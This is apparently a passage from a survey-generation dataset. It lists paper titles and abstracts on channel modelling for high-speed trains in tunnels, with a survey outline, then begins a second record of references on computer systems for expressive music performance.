long guideways within a unified simulation framework. The general-purpose RT method is applied to analyze propagation in complex areas, whereas the VPE method is reserved for long and uniform tunnel as well as open-air sections. By using the advantages of VPE to compensate for the limitations of RT and vice versa, this hybrid model ensures improved accuracy and computational savings. Numerical results are validated with experimental measurements in various railway scenarios, including an actual deployment site of communication-based train control (CBTC) systems. --- paper_title: Radio Wave Propagation in Arched Cross Section Tunnels – Simulations and Measurements paper_content: For several years, wireless communication systems have been developed for train to infrastructure communication needs related to railway or mass transit applications. The systems should be able to operate in specific environments, such as tunnels. In this context, specific radio planning tools have to be developed to optimize system deployment. Realistic tunnels geometries are generally of rectangular cross section or arch-shaped. Furthermore, they are mostly curved. In order to calculate electromagnetic wave propagation in such tunnels, specific models have to be developed. Several works have dealt with retransmission of GSM or UMTS. Few theoretical or experimental works have focused on 2.4 GHz or 5.8 GHz bands. In this paper, we propose an approach to model radio wave propagation in these frequency bands in straight arch-shaped tunnels using tessellation in multi-facets. The model is based on a Ray Tracing tool using the image method. The work reported in this paper shows the propagation loss variations according to the shape of tunnels. A parametric study on the facets size to model the cross section is conducted. The influence of tunnel dimensions and signal frequency is examined. Finally, some measurement results in a straight arch-shaped tunnel are presented and analyzed in terms of slow and fast fading. --- paper_title: SBR image approach for radio wave propagation in tunnels with and without traffic paper_content: We propose a deterministic approach to model the radio propagation channels in tunnels with and without traffic. This technique applies the modified shooting and bouncing ray (SBR) method to find equivalent sources (images) in each launched ray tube and sums the receiving complex amplitude contributed by all images coherently. In addition, the vector effective antenna height (VEH) is introduced to consider the polarization-coupling effect resulting from the shape of the tunnels. We verify this approach by comparing the numerical results in two canonical examples where closed-form solutions exist. The good agreement indicates that our method can provide a good approximation of high-frequency radio propagation inside tunnels where reflection is dominant. We show that the propagation loss in tunnels can vary considerably according to the tunnel shapes and the traffic inside them. From the results we also find a "focusing" effect, which makes the power received in an arched tunnel higher than that in a rectangular tunnel. Besides, the deep fading that appears in a rectangular tunnel is absent in an arched tunnel. The major effect of the traffic is observed to be the fast fading due to the reflection/obstruction of vehicles. Additional considerations, such as time delay, wall roughness, and wedge diffraction of radio wave propagation in tunnels are left for future studies. --- paper_title: Ray-density normalization for ray-optical wave propagation modeling in arbitrarily shaped tunnels paper_content: This work is concerned with the calculation of natural electromagnetic (EM) wave propagation and the determination of the propagation channel characteristics in highway or railway tunnels in the ultrahigh-frequency (UHF) range and above (>300 MHz). A novel ray-tracing technique based on geometrical optics (GO) is presented. Contrary to classical ray tracing, where the one ray representing a locally plane wave front is searched, the new method requires multiple representatives of each physical EM wave at a time. The contribution of each ray to the total field at the receiver is determined by the proposed ray-density normalization (RBN). This technique has the further advantage of overcoming one of the major disadvantages of GO, the failure at caustics. In contrast to existing techniques, the new approach does not use ray tubes or adaptive reception spheres. Consequently, it does not suffer their restrictions to planar geometries. Therefore, it allows one to predict the propagation of high-frequency EM waves in confined spaces with curved boundaries, like tunnels, with an adequate precision. The approach is verified theoretically with canonical examples and by various measurements at 120 GHz in scaled tunnel models. --- paper_title: Ray optical modeling of wireless communications in high-speed railway tunnels paper_content: A new deterministic approach for wave propagation modeling in high-speed train tunnels is presented. The model is based on a new ray launching method and results in the polarimetric and complex channel impulse response as well as the Doppler diagram for radio links between on-train stations and tunnel-fixed stations. Different channel simulations under certain propagation conditions are presented. --- paper_title: Channel modeling and analysis for wireless networks in underground mines and road tunnels paper_content: Wireless networks can greatly facilitate the communication in underground mines and road/subway tunnels, where the propagation characteristics of electromagnetic (EM) waves are significantly different from those in terrestrial environments. According to the structure of underground mines and road tunnels, two types of channel models can be utilized, namely, tunnel and room/pillar channel models. However, there exists no theoretical model for room-and-pillar channel in underground mines to date, and current existing tunnel channel models do not provide an analytical solution for both near and far regions of the sources. In this paper, the multimode model is proposed, which provides an analytical expression for the received power and the power delay profile at any position in a tunnel.Moreover, the multimode model is extended to characterize the room-and-pillar channel in the underground mines after combining it with the shadow fading model. The theoretical models are validated by experimental measurements. Based on the proposed channel models, the effects of various factors on the signal propagation are analyzed. The factors include: the operating frequency, the size of the tunnel or underground mine room, the antenna position and polarization, and the electrical parameters. --- paper_title: Theory of the propagation of UHF radio waves in coal mine tunnels paper_content: The theoretical study of UHF radio communication in coal mines, with particular reference to the rate of loss of signal strength along a tunnel, and from one tunnel to another around a corner is the concern of this paper. Of prime interest are the nature of the propagation mechanism and the prediction of the radio frequency that propagates with the smallest loss. The theoretical results are compared with published measurements. This work was part of an investigation of new ways to reach and extend two-way communications to the key individuals who are highly mobile within the sections and haulageways of coal mines. --- paper_title: On wireless communication in tunnels paper_content: We review recent research work on wireless communication in straight and curved tunnels. Modal theory of fields in a circular tunnel excited by a linear source is given in detail. Closed form expressions for the propagation parameters of the dominant modes in circular and rectangular straight tunnels in the high frequencies are derived. We present field measurements in tunnels and interpret them in terms of the mode theory. The main characteristics of the dominant modes in a curved tunnel are studied. --- paper_title: Radio Wave Propagation Scene Partitioning for High-Speed Rails paper_content: Radio wave propagation scene partitioning is necessary for wireless channel modeling. As far as we know, there are no standards of scene partitioning for high-speed rail (HSR) scenarios, and therefore we propose the radio wave propagation scene partitioning scheme for HSR scenarios in this paper. Based on our measurements along the Wuhan-Guangzhou HSR, Zhengzhou-Xian passenger-dedicated line, Shijiazhuang-Taiyuan passenger-dedicated line, and Beijing-Tianjin intercity line in China, whose operation speeds are above 300 km/h, and based on the investigations on Beijing South Railway Station, Zhengzhou Railway Station, Wuhan Railway Station, Changsha Railway Station, Xian North Railway Station, Shijiazhuang North Railway Station, Taiyuan Railway Station, and Tianjin Railway Station, we obtain an overview of HSR propagation channels and record many valuable measurement data for HSR scenarios. On the basis of these measurements and investigations, we partitioned the HSR scene into twelve scenarios. Further work on theoretical analysis based on radio wave propagation mechanisms, such as reflection and diffraction, may lead us to develop the standard of radio wave propagation scene partitioning for HSR. Our work can also be used as a basis for the wireless channel modeling and the selection of some key techniques for HSR systems. --- paper_title: Computational Electrodynamics the Finite-Difference Time-Domain Method paper_content: Part 1 Reinventing electromagnetics: background history of space-grid time-domain techniques for Maxwell's equations scaling to very large problem sizes defense applications dual-use electromagnetics technology. Part 2 The one-dimensional scalar wave equation: propagating wave solutions finite-difference approximation of the scalar wave equation dispersion relations for the one-dimensional wave equation numerical group velocity numerical stability. Part 3 Introduction to Maxwell's equations and the Yee algorithm: Maxwell's equations in three dimensions reduction to two dimensions equivalence to the wave equation in one dimension. Part 4 Numerical stability: TM mode time eigenvalue problem space eigenvalue problem extension to the full three-dimensional Yee algorithm. Part 5 Numerical dispersion: comparison with the ideal dispersion case reduction to the ideal dispersion case for special grid conditions dispersion-optimized basic Yee algorithm dispersion-optimized Yee algorithm with fourth-order accurate spatial differences. Part 6 Incident wave source conditions for free space and waveguides: requirements for the plane wave source condition the hard source total-field/scattered field formulation pure scattered field formulation choice of incident plane wave formulation. Part 7 Absorbing boundary conditions for free space and waveguides: Bayliss-Turkel scattered-wave annihilating operators Engquist-Majda one-way wave equations Higdon operator Liao extrapolation Mei-Fang superabsorption Berenger perfectly-matched layer (PML) absorbing boundary conditions for waveguides. Part 8 Near-to-far field transformation: obtaining phasor quantities via discrete fourier transformation surface equivalence theorem extension to three dimensions phasor domain. Part 9 Dispersive, nonlinear, and gain materials: linear isotropic case recursive convolution method linear gyrontropic case linear isotropic case auxiliary differential equation method, Lorentz gain media. Part 10 Local subcell models of the fine geometrical features: basis of contour-path FD-TD modelling the simplest contour-path subcell models the thin wire conformal modelling of curved surfaces the thin material sheet relativistic motion of PEC boundaries. Part 11 Explicit time-domain solution of Maxwell's equations using non-orthogonal and unstructured grids, Stephen Gedney and Faiza Lansing: nonuniform, orthogonal grids globally orthogonal global curvilinear co-ordinates irregular non-orthogonal unstructured grids analysis of printed circuit devices using the planar generalized Yee algorithm. Part 12 The body of revolution FD-TD algorithm, Thomas Jurgens and Gregory Saewert: field expansion difference equations for on-axis cells numerical stability PML absorbing boundary condition. Part 13 Modelling of electromagnetic fields in high-speed electronic circuits, Piket-May and Taflove. (part contents). --- paper_title: Modeling radio wave propagation in tunnels with a vectorial parabolic equation paper_content: To study radio wave propagation in tunnels, we present a vectorial parabolic equation (PE) taking into account the cross-section shape, wall impedances, slowly varying curvature, and torsion of the tunnel axis. For rectangular cross section, two polarizations are decoupled and two families of adiabatic modes can be found explicitly, giving a generalization of the known results for a uniform tunnel. In the general case, a boundary value problem arises to be solved by using finite-difference/finite-element (FD/FE) techniques. Numerical examples demonstrate the computational efficiency of the proposed method. --- paper_title: Analysis of MIMO capacity in waveguide environments using practical antenna structures for selective mode excitation paper_content: Different realistic antenna configurations are studied and their impact on MIMO capacity is investigated in waveguide-like environments, such as hallways, tunnels or streets. Simulations are conducted for a 2/spl times/2 MIMO system using the the finite element method, which is particularly well suited for this kind of problem. First, each antenna is optimized independently from the other by optimizing its shape and location in a manner that insures optimal input impedance and excitation of a single mode. Subsequently, the two antennas are placed together and a final optimization is carried out to reduce their mutual coupling and improve the impedance matching. The results obtained for a 2/spl times/2 MIMO system clearly show the significance of practical antenna considerations on MIMO capacity in a waveguide environment. --- paper_title: A multi-mode waveguide tunnel channel model for high-speed train wireless communication systems paper_content: The recent development of high-speed trains (HSTs) introduce new challenges to wireless communication systems for HSTs. For demonstrating the feasibility of these systems, accurate channel models which can mimic key characteristics of HST wireless channels are essential. In this paper, we focus on HST channel models for the tunnel scenario, which is different from other HST channel environments, such as rural area and viaducts. Considering unique characteristics of tunnel channel environments, we extend the existing multi-mode waveguide tunnel channel model to be time dependent, obtain the channel impulse responses, and then further investigate certain key tunnel channel characteristics such as temporal autocorrelation function (ACF) and power spectrum density (PSD). The impact of time on ACFs and PSDs, and the impact of frequency on the received power are revealed via numerical results. --- paper_title: Channel modeling and analysis for wireless networks in underground mines and road tunnels paper_content: Wireless networks can greatly facilitate the communication in underground mines and road/subway tunnels, where the propagation characteristics of electromagnetic (EM) waves are significantly different from those in terrestrial environments. According to the structure of underground mines and road tunnels, two types of channel models can be utilized, namely, tunnel and room/pillar channel models. However, there exists no theoretical model for room-and-pillar channel in underground mines to date, and current existing tunnel channel models do not provide an analytical solution for both near and far regions of the sources. In this paper, the multimode model is proposed, which provides an analytical expression for the received power and the power delay profile at any position in a tunnel.Moreover, the multimode model is extended to characterize the room-and-pillar channel in the underground mines after combining it with the shadow fading model. The theoretical models are validated by experimental measurements. Based on the proposed channel models, the effects of various factors on the signal propagation are analyzed. The factors include: the operating frequency, the size of the tunnel or underground mine room, the antenna position and polarization, and the electrical parameters. --- paper_title: A Hybrid Ray-Tracing/Vector Parabolic Equation Method for Propagation Modeling in Train Communication Channels paper_content: In recent years, various techniques have been applied to modeling radio-wave propagation in railway networks, each one presenting its own advantages and limitations. This paper presents a hybrid channel modeling technique, which combines two of these methods, the ray-tracing (RT) and vector parabolic equation (VPE) methods, to enable the modeling of realistic railway scenarios including stations and long guideways within a unified simulation framework. The general-purpose RT method is applied to analyze propagation in complex areas, whereas the VPE method is reserved for long and uniform tunnel as well as open-air sections. By using the advantages of VPE to compensate for the limitations of RT and vice versa, this hybrid model ensures improved accuracy and computational savings. Numerical results are validated with experimental measurements in various railway scenarios, including an actual deployment site of communication-based train control (CBTC) systems. --- paper_title: A Novel Wideband MIMO Car-to-Car Channel Model Based on a Geometrical Semi-Circular Tunnel Scattering Model paper_content: In this paper, we present a wideband multiple-input multiple-output (MIMO) car-to-car (C2C) channel model based on a geometrical semi-circular tunnel (SCT) scattering model. From the geometrical SCT scattering model, a reference channel model is derived under the assumption of single-bounce scattering in line-of-sight (LOS) and non-LOS (NLOS) propagation environments. In the proposed reference channel model, it is assumed that an infinite number of scatterers are randomly distributed on the tunnel wall. Starting from the geometrical scattering model, the time-variant transfer function (TVTF) is derived, and its correlation properties in time, frequency, and space are studied. Expressions are presented for the space–time–frequency cross-correlation function (STF-CCF), the two-dimensional (2D) space CCF, the 2D time–frequency CCF (TF-CCF), the temporal autocorrelation function (ACF), and the frequency correlation function (FCF). Owing to the semi-circular geometry, we reduced the originally threefold integrals to double integrals in the computations of the correlation functions, which simplifies the numerical analysis considerably. From the TVTF characterizing the reference model, an efficient sum-of-cisoid (SOC) channel simulator is derived. Numerical results show that both the temporal ACF and the FCF of the SOC channel simulator match very well with those of the reference model. A validation of the proposed model has been done by fitting the delay spread of the reference model to that of the measured channel, which demonstrates an excellent agreement. The proposed channel simulator allows us to evaluate the performance of C2C communication systems in tunnel environments. --- paper_title: 3D Wideband Non-Stationary Geometry-Based Stochastic Models for Non-Isotropic MIMO Vehicle-to-Vehicle Channels paper_content: Actual vehicle-to-vehicle (V2V) channel measurements have shown that the wide-sense stationary (WSS) modeling assumption is valid only for very short time intervals. This fact motivates us to develop non-WSS V2V channel models. In this paper, we propose a novel three-dimensional (3D) theoretical non-WSS regular-shaped geometry-based stochastic model (RS-GBSM) and the corresponding sum-of-sinusoids (SoS) simulation model for non-isotropic scattering wideband multiple-input multiple-output (MIMO) V2V fading channels. The movements of the transmitter (Tx), scatterers, and receiver (Rx) result in the time-varying angles of departure (AoDs) and angles of arrival (AoAs) that make our models non-stationary. The proposed RS-GBSMs, combining line-of-sight (LoS) components, a two-sphere model, and multiple confocal elliptic-cylinder models, have the ability to study the impacts of vehicular traffic density (VTD) and non-stationarity on channel statistics, and jointly consider the azimuth and elevation angles by using the von Mises Fisher (VMF) distribution. The proposed RS-GBSMs are sufficiently generic and adaptable to model various V2V scenarios. Based on the proposed 3D non-WSS RS-GBSMs, important local channel statistical properties are derived and thoroughly investigated. The impacts of VTD and non-stationarity on these channel statistical properties are investigated by comparing them with those of the corresponding WSS model. The proposed non-WSS RS-GBSMs are validated by measurements in terms of the channel stationary time. Finally, numerical and simulation results demonstrate that the 3D non-WSS model is more practical to characterize real V2V channels. --- paper_title: A non-stationary geometry-based stochastic model for MIMO high-speed train channels paper_content: In this paper, a non-stationary wideband geometry-based stochastic model (GBSM) is proposed for multiple-input multiple-output (MIMO) high-speed train (HST) channels. The proposed model employs multiple confocal ellipses model, where the received signal is a superposition of the line-of-sight (LoS) and single-bounced rays. Because of the time-varying feature of angles of arrival (AoAs), angles of departure (AoDs), and LoS angle, the proposed GBSM has the ability to investigate the non-stationarity of HST environment caused by the high speed movement of the receiver. From the proposed model, the local spatial cross-correlation function (CCF) and the local temporal autocorrelation (ACF) are derived for different taps. Numerical results and analysis show that the proposed channel model is capable of characterizing the time-variant HST wireless channel. --- paper_title: Novel 3D Geometry-Based Stochastic Models for Non-Isotropic MIMO Vehicle-to-Vehicle Channels paper_content: This paper proposes a novel three-dimensional (3D) theoretical regular-shaped geometry-based stochastic model (RS-GBSM) and the corresponding sum-of-sinusoids (SoS) simulation model for non-isotropic multiple-input multiple-output (MIMO) vehicle-to-vehicle (V2V) Ricean fading channels. The proposed RS-GBSM, combining line-of-sight (LoS) components, a two-sphere model, and an elliptic-cylinder model, has the ability to study the impact of the vehicular traffic density (VTD) on channel statistics, and jointly considers the azimuth and elevation angles by using the von Mises Fisher distribution. Moreover, a novel parameter computation method is proposed for jointly calculating the azimuth and elevation angles in the SoS channel simulator. Based on the proposed 3D theoretical RS-GBSM and its SoS simulation model, statistical properties are derived and thoroughly investigated. The impact of the elevation angle in the 3D model on key statistical properties is investigated by comparing with those of the corresponding two-dimensional (2D) model. It is demonstrated that the 3D model is more accurate to characterize real V2V channels, in particular for pico cell scenarios. Finally, close agreement is achieved between the theoretical model, SoS simulation model, and simulation results, demonstrating the utility of the proposed models. --- paper_title: Road traffic density estimation in vehicular networks paper_content: Road traffic density estimation provides important information for road planning, intelligent road routing, road traffic control, vehicular network traffic scheduling, routing and dissemination. The ever increasing number of vehicles equipped with wireless communication capabilities provide new means to estimate the road traffic density more accurately and in real time than traditionally used techniques. In this paper, we consider the problem of road traffic density estimation where each vehicle estimates its local road traffic density using some simple measurements only, i.e. the number of neighboring vehicles. A maximum likelihood estimator of the traffic density is obtained based on a rigorous analysis of the joint distribution of the number of vehicles in each hop. Analysis is also performed on the accuracy of the estimation and the amount of neighborhood information required for an accurate road traffic density estimation. Simulations are performed which validate the accuracy and the robustness of the proposed density estimation algorithm. --- paper_title: GBSB MODEL for MIMO Channel AND its Space-time CORRELATION Analysis in Tunnel paper_content: Aiming at the special space in the tunnel, this paper assumes the geometric distribution of scatterers which is totally different from on the ground, puts forward a new GBSB model of MIMO channel and deduces the space-time correlation function of the model. The results of theoretical analysis and simulation show that the model can more accurately reflect the factors which impact the channel correlation in the tunnel. --- paper_title: A generic non-stationary MIMO channel model for different high-speed train scenarios paper_content: This paper proposes a generic non-stationary wideband geometry-based stochastic model (GBSM) for multiple-input multiple-output (MIMO) high-speed train (HST) channels. The proposed generic model can be applied on the three most common HST scenarios, i.e., open space, viaduct, and cutting scenarios. A good agreement between the statistical properties of the proposed generic model and those of relevant measurement data from the aforementioned scenarios demonstrates the utility of the proposed channel model. --- paper_title: Finite-State Markov Modeling for Wireless Channels in Tunnel Communication-Based Train Control Systems paper_content: Communication-based train control (CBTC) is being rapidly adopted in urban rail transit systems, as it can significantly enhance railway network efficiency, safety, and capacity. Since CBTC systems are mostly deployed in underground tunnels and trains move at high speeds, building a train–ground wireless communication system for CBTC is a challenging task. Modeling the tunnel channels is very important in designing the wireless networks and evaluating the performance of CBTC systems. Most existing works on channel modeling do not consider the unique characteristics of CBTC systems, such as high mobility speed, deterministic moving direction, and accurate train-location information. In this paper, we develop a finite-state Markov channel (FSMC) model for tunnel channels in CBTC systems. The proposed FSMC model is based on real field CBTC channel measurements obtained from a business-operating subway line. Unlike most existing channel models, which are not related to specific locations, the proposed FSMC channel model takes train locations into account to have a more accurate channel model. The distance between the transmitter and the receiver is divided into intervals and an FSMC model is applied in each interval. The accuracy of the proposed FSMC model is illustrated by the simulation results generated from the model and the real field measurement results. --- paper_title: A survey on vehicle-to-vehicle propagation channels paper_content: Traffic telematics applications are currently under intense research and development for making transportation safer, more efficient, and more environmentally friendly. Reliable traffic telematics applications and services require vehicle-to-vehicle wireless communications that can provide robust connectivity, typically at data rates between 1 and 10 Mb/s. The development of such VTV communications systems and standards require, in turn, accurate models for the VTV propagation channel. A key characteristic of VTV channels is their temporal variability and inherent non-stationarity, which has major impact on data packet transmission reliability and latency. This article provides an overview of existing VTV channel measurement campaigns in a variety of important environments, and the channel characteristics (such as delay spreads and Doppler spreads) therein. We also describe the most commonly used channel modeling approaches for VTV channels: statistical as well as geometry-based channel models have been developed based on measurements and intuitive insights. Extensive references are provided. --- paper_title: Vehicle-to-vehicle channel modeling and measurements: recent advances and future challenges paper_content: Vehicle-to-vehicle communications have recently received much attention due to some new applications, such as wireless mobile ad hoc networks, relay-based cellular networks, and intelligent transportation systems for dedicated short range communications. The underlying V2V channels, as a foundation for the understanding and design of V2V communication systems, have not yet been sufficiently investigated. This article aims to review the state-of-the-art in V2V channel measurements and modeling. Some important V2V channel measurement campaigns and models are briefly described and classified. Finally, some challenges of V2V channel measurements and modeling are addressed for future studies. --- paper_title: 3D non-stationary wideband circular tunnel channel models for high-speed train wireless communication systems paper_content: This paper proposes three-dimensional (3D) non-stationary wideband circular geometry-based stochastic models (GBSMs) for high-speed train (HST) tunnel scenarios. Considering single-bounced (SB) and multiple-bounced (MB) components from the tunnel's internal surfaces, a theoretical channel model is first established. Then, the corresponding simulation model is developed using the method of equal volume (MEV) to calculate discrete angular parameters. Based on the proposed 3D GBSMs, important time-variant statistical properties are investigated, such as the temporal autocorrelation function (ACF), spatial cross-correlation function (CCF), and space-Doppler (SD) power spectrum density (PSD). Results indicate that all statistical properties of the simulation model, verified by simulation results, can match well those of the theoretical model. The statistical properties of the proposed 3D GBSMs are further validated by relevant measurement data, demonstrating the flexibility and utility of our proposed tunnel GBSMs. --- paper_title: GBSB MODEL for MIMO Channel AND its Space-time CORRELATION Analysis in Tunnel paper_content: Aiming at the special space in the tunnel, this paper assumes the geometric distribution of scatterers which is totally different from on the ground, puts forward a new GBSB model of MIMO channel and deduces the space-time correlation function of the model. The results of theoretical analysis and simulation show that the model can more accurately reflect the factors which impact the channel correlation in the tunnel. --- paper_title: Communication in tunnel: Channel characteristics and performance of diversity schemes paper_content: This paper gives an overview of the theoretical and experimental approach which has been carried out in order to study the narrow band and wideband channel characteristics in a straight semi-arched tunnel. To improve the reliability of the link in terms of bit error rate and/or channel capacity, Multiple Input Multiple Output (MIMO) techniques have been proposed. Usually the efficiency of MIMO techniques is often compared to the performances of a Single Input Single Output (SISO) system, chosen as a reference. In this presentation, other diversity schemes at the receiving side as selection combining and maximum ratio combining are also considered since they have an easier implantation. --- paper_title: Wireless Communication for Heavy Haul Railway Tunnels Based on Distributed Antenna Systems paper_content: Radio-over-fiber (RoF) technology can improve reliability and quality of service (QoS) of railway communication systems effectively. This paper studies directional antenna radiating same direction and intercross base station redundant network these two coverage strategies of RoF in long heavy haul railway tunnels (more than 1 km). As RAUs (remote antenna unit) deployed in long tunnels, according to different coverage strategies, the number of RAUs is different, this will lead various handover mechanisms. Based on the channel modeling of simulator in this paper, coverage efficiency (power consumption of unit distance in tunnel) handover trigger probability and outage probability are adopted to compare the performance of these two coverage strategies. It can be concluded that when using directional antenna radiating same direction, due to the longer radiate distance R, it has better coverage efficiency, and the trigger probability almost reached 100% once entered the overlapping area, and the handover outage probability is clearly lower than using intercross base station antenna network, even if the train is fast. ---
Title: Channel measurements and models for high-speed train wireless communication systems in tunnel scenarios: a survey Section 1: Introduction Description 1: Introduce the importance of HST wireless communication systems in tunnel scenarios and provide an overview of the paper. Section 2: HST channel measurements in tunnel scenarios Description 2: Review and classify recent HST tunnel channel measurements based on various parameters and statistics. Section 3: Measurement setup Description 3: Discuss details of the setups used in HST tunnel channel measurements, including antenna configurations and frequency bands. Section 4: Large-scale vs. small-scale fading Description 4: Explain large-scale and small-scale fading characteristics in HST tunnel scenarios. Section 5: Far region vs. near region inside tunnel Description 5: Describe the differentiation between far and near regions inside tunnels and their impact on channel characteristics. Section 6: Typical propagation zones Description 6: Discuss the different propagation zones in tunnels and how they affect propagation characteristics. Section 7: Parameters influencing radio propagation inside tunnel Description 7: Outline various parameters, such as tunnel size and shape, that affect radio propagation in tunnels. Section 8: HST channel models in tunnel scenarios Description 8: Present an overview of different HST tunnel channel models discussed in the literature. Section 9: Network architectures for tunnels Description 9: Discuss possible network architectures for providing wireless coverage inside tunnels. Section 10: Modeling approaches of HST tunnel channel models Description 10: Explain various modeling approaches for HST tunnel channel models, such as deterministic, stochastic, and hybrid models. Section 11: Research directions in HST tunnel channel measurements and models Description 11: Discuss future research directions in HST tunnel channel measurements and modeling. Section 12: Conclusion Description 12: Summarize the key points of the survey and highlight the importance of future work.
A survey of computer systems for expressive music performance
38
--- paper_title: A Composer's Introduction to Computer Music. paper_content: Abstract A historical survey of computer music is presented. As the title suggests, this survey is written for the composer, in order to facilitate his access to the tools currently offered by technology. Approaches both to computer composition and to sound synthesis techniques are considered. These are discussed in terms of their music‐theoretical implications, modes of man‐machine communication, and hardware configurations. Under computer composition, the various degrees to which a digital computer can participate in the compositional process are discussed. As regards sound synthesis, both digital and hybrid techniques are considered. Throughout, the presentation is based on a discussion of specific systems, which provide a historical review of the field. In addition, extensive references are made to the existing literature, in order to direct the reader to additional information. --- paper_title: Musical performance. A synthesis‐by‐rule approach paper_content: The general purpose of the present paper is to demonstrate some effects on the musical acceptability of a performance of a melody, which may be achieved by means of a synthesis‐by‐rule strategy. Both the structure of a melody and the playing technique of the performer seem important to the music perception and musical performance quality. The synthesis equipment used here consists of a computer controlled synthesizer. The input is the melody written in ordinary notation, and optionally complemented with phrase markers. This is the input material to a text‐to‐speech conversion program [Carlson and Granstrom, in Speech Communication II. edited by G. Fant (Stockholm, 1975) pp. 245‐253] now adapted to for notation‐to‐music conversion. Some of the rules relating the performance to the structure operate on a phase level, and other rules operate on sequences of two or three notes only. As regar‐s production aspects, the influence of a raising of the larynx in singing on the perceived musical quality of the perfo... --- paper_title: Composing Music with Computers paper_content: Foreword by Daniel V. Oppenheim Preface Computer music: facing the facts Preparing the ground Probabilities, grammars and automata Iterative algorithms: chaos and fractals Neural computation and music Evolutionary music: breaking new ground Case studies Music composition software on the CD-ROM Epilogue Appendix 1: Excerpt of J. S. Bach's Choral BWV 668 Appendix 2: Musical clip Appendix 3: Formant chart Appendix 4: A primer in Lisp programming References CD-ROM Instructions --- paper_title: The Computer Music Tutorial paper_content: From the Publisher: ::: The Computer Music Tutorial is a comprehensive text and reference that covers all aspects of computer music, including digital audio, synthesis techniques, signal processing, musical input devices, performance software, editing systems, algorithmic composition, MIDI, synthesizer architecture, system interconnection, and psychoacoustics. A special effort has been made to impart an appreciation for the rich history behind current activities in the field. ::: Profusely illustrated and exhaustively referenced and cross-referenced, The Computer Music Tutorial provides a step-by-step introduction to the entire field of computer music techniques. Written for nontechnical as well as technical readers, it uses hundreds of charts, diagrams, screen images, and photographs as well as clear explanations to present basic concepts and terms. Mathematical notation and program code examples are used only when absolutely necessary. Explanations are not tied to any specific software or hardware. ::: Curtis Roads has served as editor-in-chief of Computer Music Journal for more than a decade and is a recognized authority in the field. The material in this book was compiled and refined over a period of several years of teaching in classes at Harvard University, Oberlin Conservatory, the University of Naples, IRCAM, Les Ateliers UPIC, and in seminars and workshops in North America, Europe, and Asia. --- paper_title: Emotional Expression in Music Performance: Between the Performer's Intention and the Listener's Experience: paper_content: Nine professional musicians were instructed to perform short melodies using various instruments - the violin, electric guitar, flute, and singing voice - so as to communicate specific emotional characters to listeners. The performances were first validated by having listeners rating the emotional expression and then analysed with regard to their physical characteristics, e.g. tempo, dynamics, timing, and spectrum. The main findings were that (a) the performer's expressive intention had a marked effect on all analysed variables; (b) the performers showed many similarities as well as individual differences in emotion encoding; (c) listeners were generally successful in decoding the intended expression; and (d) some emotional characters seemed easier to communicate than others. The reported results imply that we are unlikely to find performance rules independent of instrument, musical style, performer, or listener. --- paper_title: Does music performance allude to locomotion? A model of final ritardandi derived from measurements of stopping runners paper_content: This investigation explores the common assumption that music and motion are closely related by comparing the stopping of running and the termination of a piece of music. Video recordings were made ... --- paper_title: Music performance research at the millennium paper_content: Empirical research on music performance has increased considerably during recent decades. This article updates the review of the research up to 1995 published by the current author in 1999. Covering about 200 papers from 1995 up to 2002, this article confirms the impression that music performance research is in a very active stage. As in the previous review, the majority of papers are on measurement of performance, but there is a rapidly increasing number of contributions concerning models of performance, performance planning and practice. Although fewer in number, there are also many new contributions within each of the remaining areas of performance research analysed in this review. --- paper_title: Five Facets of Musical Expression: A Psychologist's Perspective on Music Performance paper_content: The aim of this article is to outline a psychological approach to expression in music performance that could help to provide a solid foundation for the teaching of expressive skills in music education. Drawing on previous research, the author suggests that performance expression is best conceptualized as a multi-dimensional phenomenon consisting of five primary components: (a) Generative rules that function to clarify the musical structure; (b) Emotional expression that serves to convey intended emotions to listeners; (c) Random variations that reflect human limitations with regard to internal time-keeper variance and motor delays; (d) Motion principles that prescribe that some aspects of the performance (e.g. timing) should be shaped in accordance with patterns of biological motion; and (e) Stylistic unexpectedness that involves local deviations from performance conventions. An analysis of performance expression in terms of these five components - collectively referred to as the GERMS model - has importa... --- paper_title: Music performance research at the millennium paper_content: Empirical research on music performance has increased considerably during recent decades. This article updates the review of the research up to 1995 published by the current author in 1999. Covering about 200 papers from 1995 up to 2002, this article confirms the impression that music performance research is in a very active stage. As in the previous review, the majority of papers are on measurement of performance, but there is a rapidly increasing number of contributions concerning models of performance, performance planning and practice. Although fewer in number, there are also many new contributions within each of the remaining areas of performance research analysed in this review. --- paper_title: The Computer Music Tutorial paper_content: From the Publisher: ::: The Computer Music Tutorial is a comprehensive text and reference that covers all aspects of computer music, including digital audio, synthesis techniques, signal processing, musical input devices, performance software, editing systems, algorithmic composition, MIDI, synthesizer architecture, system interconnection, and psychoacoustics. A special effort has been made to impart an appreciation for the rich history behind current activities in the field. ::: Profusely illustrated and exhaustively referenced and cross-referenced, The Computer Music Tutorial provides a step-by-step introduction to the entire field of computer music techniques. Written for nontechnical as well as technical readers, it uses hundreds of charts, diagrams, screen images, and photographs as well as clear explanations to present basic concepts and terms. Mathematical notation and program code examples are used only when absolutely necessary. Explanations are not tied to any specific software or hardware. ::: Curtis Roads has served as editor-in-chief of Computer Music Journal for more than a decade and is a recognized authority in the field. The material in this book was compiled and refined over a period of several years of teaching in classes at Harvard University, Oberlin Conservatory, the University of Naples, IRCAM, Les Ateliers UPIC, and in seminars and workshops in North America, Europe, and Asia. --- paper_title: The Analysis and Cognition of Basic Melodic Structures: The Implication-Realization Model paper_content: Eugene Narmour formulates a comprehensive theory of melodic syntax to explain cognitive relations between melodic tones at their most basic level. Expanding on the theories of Leonard B. Meyer, the author develops one parsimonious, scaled set of rules modeling implication and realization in all the primary parameters of music. Through an elaborate and original analytic symbology, he shows that a kind of "genetic code" governs the perception and cognition of melody. One is an automatic, "brute" system operating on stylistic primitives from the bottom up. The other constitutes a learned system of schemata impinging on style structures from the top down. The theoretical constants Narmour uses are context-free and, therefore, applicable to all styles of melody. He places considerable emphasis on the listener's cognitive performance (that is, fundamental melodic perception as opposed to acquired musical competence). He concentrates almost exclusively on low-level, note-to-note relations. The result is a highly generalized theory useful in researching all manner of psychological and music-theoretic problems concerned with the analysis and cognition of melody. "In this innovative, landmark book, a distinguished music theorist draws extensively from a variety of disciplines, in particular from cognitive psychology and music theory, to develop an elegant and persuasive framework for the understanding of melody. This book should be read by all scholars with a serious interest in music."--Diana Deutsch, Editor, Music Perception --- paper_title: Artificial neural networks based models for automatic performance of musical scores paper_content: This article briefly summarises the author's research on automatic performance, started at CSC (Centro di Sonologia Computazionale, University of Padua) and continued at TMH-KTH (Speech, Music Hear ... --- paper_title: Composing Music by Composing Rules: Design and Usage of a Generic Music Constraint System paper_content: This research presents the design, usage, and evaluation of a highly generic music constraint system called 